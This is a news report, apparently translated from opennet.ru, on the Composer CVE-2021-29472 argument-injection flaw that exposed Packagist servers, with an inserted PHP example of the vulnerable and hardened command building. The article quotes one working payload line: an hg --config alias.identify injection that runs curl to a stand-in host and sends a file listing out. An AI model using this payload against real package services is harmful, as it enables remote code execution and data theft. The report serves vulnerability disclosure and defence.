A vulnerability in the Composer package manager allowed the Packagist PHP repository to be compromised.

A critical vulnerability (CVE-2021-29472) has been identified in the Composer dependency manager that allows arbitrary commands to be executed on the system when a package with a specially crafted URL value, the one that specifies the address for downloading the source code, is processed. The problem manifests in the GitDriver, SvnDriver and HgDriver components used when working with the Git, Subversion and Mercurial source control systems. The vulnerability was fixed in Composer releases 1.10.22 and 2.0.13.

Notably, the issue mainly affected Composer's default package repository, Packagist, which hosts 306 thousand packages from PHP developers and serves more than 306 billion downloads per month. Tests showed that, had information about the problem been available, attackers could have gained control of the Packagist infrastructure and intercepted maintainers' credentials, or redirected package downloads to a third-party server, arranging for modified package variants with malicious changes to be delivered and a backdoor to be planted during dependency installation.

The risk to end users is limited, since the contents of composer.json are usually defined by the user and the source links are passed along when third-party repositories are fetched, which are usually trusted. The main impact fell on the Packagist.org repository and the Private Packagist service, which invoke Composer while passing it data received from users. Attackers could execute their code on Packagist's servers by submitting a specially crafted package.

The Packagist team fixed the vulnerability within 12 hours of being notified. The researchers privately notified the Packagist developers on April 12, and the problem was fixed the same day. A public Composer release fixing the vulnerability was published on April 22, with details disclosed on April 27. An audit of the logs on the Packagist servers revealed no suspicious activity related to the vulnerability.

The problem is caused by a bug in the code that validates URLs in the root composer.json file and in source download links. The bug had been present in the code since November 2011. Packagist uses special abstraction layers to organize code downloads without being tied to a specific source control system; these are implemented by calling "fromShellCommandline" and passing command-line arguments. For example, for git, the command "git ls-remote --heads $URL" is invoked, where the URL is processed with the "ProcessExecutor::escape($url)" method, which escapes potentially dangerous constructs such as "$(...)" or "`...`".

The crux of the problem is that the ProcessExecutor::escape method did not escape the "--" sequence, which allowed any additional invocation parameter to be specified in the URL. Such escaping was missing in the GitDriver.php, SvnDriver.php and HgDriver.php drivers. An attack on GitDriver.php was hampered by the fact that the "git ls-remote" command does not support specifying additional arguments after the path. An attack on HgDriver.php was made possible by passing the "--config" parameter to the "hg" utility, which lets one arrange the execution of any command by manipulating the "alias.identify" setting. For example, to download and execute code by running the curl utility, one could specify: --config=alias.identify=!curl http://exfiltration-host.tld --data "$(ls -alh)"
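The two paragraphs above describe an argument-injection bug rather than a shell-injection bug: quoting for the shell keeps `$(...)` from running, but a value that starts with `--` is still parsed as an option by the tool it is handed to. The following PHP is an added illustration of that pattern and of the usual fix; it is not Composer's or Packagist's code. `escapeshellarg()` stands in for `ProcessExecutor::escape()` (an assumption), `hg identify` is used as the invoked command, the URL allow-list is constructed for the example, and the option-shaped input is a harmless placeholder rather than the payload quoted above.

```php
<?php
// Added example (not Composer's code): shell escaping versus option injection.
declare(strict_types=1);

/**
 * Vulnerable pattern: quote the URL for the shell and append it.
 * escapeshellarg() neutralises $(...) and backticks, but a value beginning
 * with "--" still reaches hg as a single argument that hg parses as an option.
 */
function buildHgCommandVulnerable(string $url): string
{
    return 'hg identify ' . escapeshellarg($url);
}

/**
 * Hardened pattern: refuse option-shaped values and put the end-of-options
 * marker "--" before the positional argument, so the tool treats whatever
 * follows as data even if the first check were ever bypassed.
 */
function buildHgCommandHardened(string $url): string
{
    if (!isValidSourceUrl($url)) {
        throw new InvalidArgumentException('refusing option-like source URL: ' . $url);
    }
    return 'hg identify -- ' . escapeshellarg($url);
}

/**
 * Minimal allow-list for a source URL: never a leading "-", and only schemes
 * a VCS driver is expected to handle (the scheme list is a constructed example).
 */
function isValidSourceUrl(string $url): bool
{
    if ($url === '' || $url[0] === '-') {
        return false;
    }
    return (bool) preg_match('#^(https?|ssh|git|hg|svn|file)://#i', $url);
}

// Constructed inputs: a benign repository URL and an option-shaped value of the
// kind the advisory describes (placeholder command, not a real payload).
$samples = [
    'https://example.invalid/vendor/package',
    '--config=alias.identify=!echo injected',
];

foreach ($samples as $url) {
    echo "input: $url\n";
    echo "  vulnerable: " . buildHgCommandVulnerable($url) . "\n";
    try {
        echo "  hardened:   " . buildHgCommandHardened($url) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "  hardened:   rejected (" . $e->getMessage() . ")\n";
    }
}
```

Running it shows the escaped option-shaped value surviving intact in the vulnerable command line, and the hardened builder rejecting it; a detection rule for this class of bug is the same check in reverse: any externally supplied value that lands in a command line and begins with `-` deserves scrutiny, regardless of how well it is quoted.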

By submitting a test package with a URL of this kind to Packagist, the researchers confirmed that, following the submission, their server received an HTTP request from one of Packagist's servers in AWS containing a listing of the files in the current directory.

Source: opennet.ru
